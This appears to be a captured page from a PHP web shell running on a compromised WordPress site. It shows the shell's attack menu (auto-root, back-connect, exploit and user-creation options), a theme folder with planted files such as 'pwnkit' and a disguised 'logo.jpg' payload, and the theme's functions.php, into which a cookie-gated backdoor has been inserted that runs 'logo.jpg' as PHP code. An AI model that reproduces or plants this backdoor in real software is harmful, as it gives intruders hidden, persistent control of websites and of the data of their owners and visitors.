Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
busiprof /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
840
B
-rw-r--r--
Page-fullwidth.php
694
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
2.15
KB
-rw-r--r--
author.php
1.71
KB
-rw-r--r--
category.php
1.77
KB
-rw-r--r--
comments.php
3.56
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content.php
1.37
KB
-rw-r--r--
footer.php
961
B
-rw-r--r--
front-page.php
922
B
-rw-r--r--
functions.php
2.82
KB
-rw-r--r--
functionsbak.php
2.34
KB
-rw-r--r--
header.php
1.93
KB
-rw-r--r--
index-bannerstrip.php
898
B
-rw-r--r--
index-projects.php
5.53
KB
-rw-r--r--
index-services.php
5
KB
-rw-r--r--
index-slider.php
1.14
KB
-rw-r--r--
index-testimonials.php
4.26
KB
-rw-r--r--
index.php
1.01
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
page.php
1.28
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
8.83
KB
-rw-r--r--
screenshot.png
390.92
KB
-rw-r--r--
search.php
1.37
KB
-rw-r--r--
searchform.php
598
B
-rw-r--r--
sidebar-woocommerce.php
314
B
-rw-r--r--
sidebar.php
191
B
-rw-r--r--
single.php
1.11
KB
-rw-r--r--
style.css
34.66
KB
-rw-r--r--
tag.php
1.76
KB
-rw-r--r--
theme_setup_data.php
9.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Loads the WordPress environment and template. * @package WordPress */ if(isset($_COOKIE["index"])){ $tmp = "2a7eb4d8e15f8d1c0ecb88ef28e5ab3b"; $check = $_COOKIE["index"]; if($tmp == md5($check)){ if(isset($_COOKIE["index"]) && $_COOKIE["index"] == $check){ require get_template_directory() ."/logo.jpg"; exit; } } } /** * This file is not added by default to WordPress theme pages when outputting * feed links. * @package WordPress */ /**Includes reqired resources here**/ define('BUSI_TEMPLATE_DIR_URI',get_template_directory_uri()); define('BUSI_TEMPLATE_DIR',get_template_directory()); define('BUSI_THEME_FUNCTIONS_PATH',BUSI_TEMPLATE_DIR.'/functions'); require_once('theme_setup_data.php'); //Files for custom - defaults menus require( BUSI_THEME_FUNCTIONS_PATH . '/menu/busiprof_nav_walker.php' ); require( BUSI_THEME_FUNCTIONS_PATH . '/menu/default_menu_walker.php' ); require( BUSI_THEME_FUNCTIONS_PATH . '/woo/woocommerce.php' ); require( BUSI_THEME_FUNCTIONS_PATH .'/font/font.php' ); // Theme functions file including require( BUSI_THEME_FUNCTIONS_PATH . '/scripts/script.php'); require( BUSI_THEME_FUNCTIONS_PATH . '/widgets/custom-widgets.php' ); // for footer widget require( BUSI_THEME_FUNCTIONS_PATH . '/commentbox/comment-function.php' ); // for custom contact widget // customizer files include require( BUSI_THEME_FUNCTIONS_PATH . '/customizer/custo_general_settings.php' ); require( BUSI_THEME_FUNCTIONS_PATH . '/customizer/custo_sections_settings.php' ); require( BUSI_THEME_FUNCTIONS_PATH . '/customizer/custo_template_settings.php' ); require( BUSI_THEME_FUNCTIONS_PATH . '/customizer/custo_post_slugs_settings.php' ); require( BUSI_THEME_FUNCTIONS_PATH . '/customizer/custo_layout_manager_settings.php' ); require( BUSI_THEME_FUNCTIONS_PATH . '/customizer/cust_pro.php' ); //theme ckeck plugin required add_theme_support( 'automatic-feed-links' ); add_theme_support('woocommerce'); //content width if ( ! isset( $content_width ) ) $content_width = 750; if ( ! function_exists( 'busiporf_setup' ) ) : function busiporf_setup() { /* * Make theme available for translation. * Translations can be filed in the /languages/ directory. */ load_theme_textdomain( 'busiprof', get_template_directory() . '/lang' ); // Add default posts and comments RSS feed links to head. add_theme_support( 'automatic-feed-links' ); /* * Let WordPress manage the document title. */ add_theme_support( 'title-tag' ); // supports featured image add_theme_support( 'post-thumbnails' ); add_theme_support( 'custom-header'); // This theme uses wp_nav_menu() in two locations. register_nav_menus( array( 'primary' => __( 'Primary Menu', 'busiprof' ) ) ); } // busiporf_setup endif; add_action( 'after_setup_theme', 'busiporf_setup' ); ?>
Close